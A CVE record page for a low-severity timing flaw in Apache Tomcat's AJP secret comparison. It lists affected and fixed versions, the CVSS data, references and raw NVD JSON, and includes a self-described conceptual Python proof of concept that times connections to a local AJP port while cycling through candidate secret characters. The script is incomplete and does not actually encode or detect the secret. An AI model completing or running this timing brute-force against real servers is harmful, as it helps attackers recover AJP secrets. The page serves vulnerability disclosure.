CVE-2026-43514

Description

Observable Timing Discrepancy vulnerability when comparing AJP secret in Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.21, from 10.1.0-M1 through 10.1.54, from 9.0.0.M1 through 9.0.117, from 8.5.0 through 8.5.100, from 7.0.0 through 7.0.109. Older unsupported versions may also be affected. Users are recommended to upgrade to version 11.0.22, 10.1.55 or 9.0.118 which fix the issue.

CVSS Details

CVSS Score

3.7

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* - VULNERABLE

Apache Tomcat 11.0.0-M1 through 11.0.21

Apache Tomcat 10.1.0-M1 through 10.1.54

Apache Tomcat 9.0.0.M1 through 9.0.117

Apache Tomcat 8.5.0 through 8.5.100

Apache Tomcat 7.0.0 through 7.0.109

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket
import time

# Conceptual PoC for Timing Attack on AJP Secret
# This script demonstrates measuring response times for different secrets.
# Note: AJP is a binary protocol. This is a simplified logic demonstration.

def send_ajp_probe(host, port, secret_candidate):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(5)
    start_time = time.time()
    try:
        s.connect((host, port))
        # Construct a minimal AJP magic packet and a login attempt with the secret
        # Real AJP packet structure is more complex (0x1234, 0x00C, etc.)
        # Here we simulate sending data that triggers the secret check
        magic_bytes = b'\x12\x34\x00\x0C' 
        # In a real exploit, you would encode the secret_candidate into the AJP packet
        s.sendall(magic_bytes)
        
        # Wait for response
        data = s.recv(1024)
    except Exception as e:
        pass
    end_time = time.time()
    s.close()
    return end_time - start_time

def brute_force_timing(host, port, charset):
    current_secret = ""
    # Simplified loop: In reality, you would iterate to find the next char
    # that causes a statistically significant delay.
    print(f"[*] Starting timing analysis against {host}:{port}")
    for char in charset:
        test_secret = current_secret + char
        durations = []
        # Send multiple requests to average out network noise
        for _ in range(10):
            duration = send_ajp_probe(host, port, test_secret)
            durations.append(duration)
        avg_duration = sum(durations) / len(durations)
        print(f"Testing '{test_secret}': Avg Time {avg_duration:.6f}s")
        # Logic to determine if the delay indicates a match would go here

if __name__ == "__main__":
    TARGET_HOST = "127.0.0.1"
    TARGET_PORT = 8009
    CHARSET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    brute_force_timing(TARGET_HOST, TARGET_PORT, CHARSET)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-43514
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-43514
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-43514/
[4] VulDB https://vuldb.com/cve/CVE-2026-43514
[5] https://lists.apache.org/thread/2k654v5cq123npfsd1b2kk1y30owqb1m
[6] http://www.openwall.com/lists/oss-security/2026/05/12/10

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-43514", "sourceIdentifier": "[email protected]", "published": "2026-05-12T16:16:18.370", "lastModified": "2026-05-14T18:46:41.457", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Observable Timing Discrepancy vulnerability when comparing AJP secret in Apache Tomcat.\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.21, from 10.1.0-M1 through 10.1.54, from 9.0.0.M1 through 9.0.117, from 8.5.0 through 8.5.100, from 7.0.0 through 7.0.109.\nOlder unsupported versions may also be affected.\n\nUsers are recommended to upgrade to version 11.0.22, 10.1.55 or 9.0.118 which fix the issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-208"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndIncluding": "7.0.109", "matchCriteriaId": "5BE0EC99-5BCD-4F7F-8124-4A1734B7BF6B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.5.0", "versionEndIncluding": "8.5.100", "matchCriteriaId": "FF43D0D7-FBF3-4D7A-84C4-47B65A75A524"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.0.0", "versionEndExcluding": "9.0.118", "matchCriteriaId": "1E5A897C-91F4-449E-984C-7D693B137EED"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.1.0", "versionEndExcluding": "10.1.55", "matchCriteriaId": "5F289287-8587-4BB3-B4AB-3B5CF4A7D27A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0", "versionEndExcluding": "11.0.22", "matchCriteriaId": "03FB799D-A66F-4792-A0CF-16D67BB53F08"}]}]}], "references": [{"url": "https://lists.apache.org/thread/2k654v5cq123npfsd1b2kk1y30owqb1m", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/12/10", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}